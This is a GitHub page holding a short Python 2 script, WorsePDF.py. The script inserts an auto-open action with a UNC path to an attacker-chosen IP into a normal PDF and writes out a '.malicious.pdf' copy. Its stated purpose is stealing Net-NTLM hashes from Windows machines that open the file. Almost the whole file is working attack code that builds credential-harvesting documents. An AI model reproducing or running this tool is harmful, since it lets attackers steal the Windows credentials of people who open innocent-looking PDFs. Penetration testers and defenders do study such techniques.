-
Notifications
You must be signed in to change notification settings - Fork 77
/
WorsePDF.py
49 lines (39 loc) · 1.5 KB
/
WorsePDF.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#
# WorsePDF
# Turn a normal PDF file into malicious.Use to steal Net-NTLM Hashes from windows machines.
# Reference :
# https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/
# https://github.com/deepzec/Bad-Pdf
# By: 3gstudent
# License: BSD 3-Clause
import sys
def AddPayload(Data,ip):
Payload = '/AA <</O <</F (\\\\\\\\' + ip + '\\\\test)/D [ 0 /Fit]/S /GoToE>>>>'
index1 = Data.find('/Parent') + 13
# print "%x" % index1
Newdata = Data[0:index1] + Payload + Data[index1:]
return Newdata
if __name__ == "__main__":
print "WorsePDF - Turn a normal PDF file into malicious.Use to steal Net-NTLM Hashes from windows machines."
print "Reference :"
print " https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/"
print " https://github.com/deepzec/Bad-Pdf"
print "Author: 3gstudent\n"
if len(sys.argv)!=3:
print ('Usage:')
print (' WorsePDF.py <normal PDF file Path> <ServerIP>')
sys.exit(0)
print "[*]NormalPDF: %s" % sys.argv[1]
print "[*]ServerIP: %s" % sys.argv[2]
file_object = open(sys.argv[1],'rb')
try:
all_the_text = file_object.read( )
finally:
file_object.close()
Newdata = AddPayload(all_the_text,sys.argv[2])
MaliciousPath = sys.argv[1] + '.malicious.pdf'
print "[+]MaliciousPDF: %s" % MaliciousPath
file_object2 = open(MaliciousPath, 'wb')
file_object2.write(Newdata)
file_object2.close()
print "[*]All Done"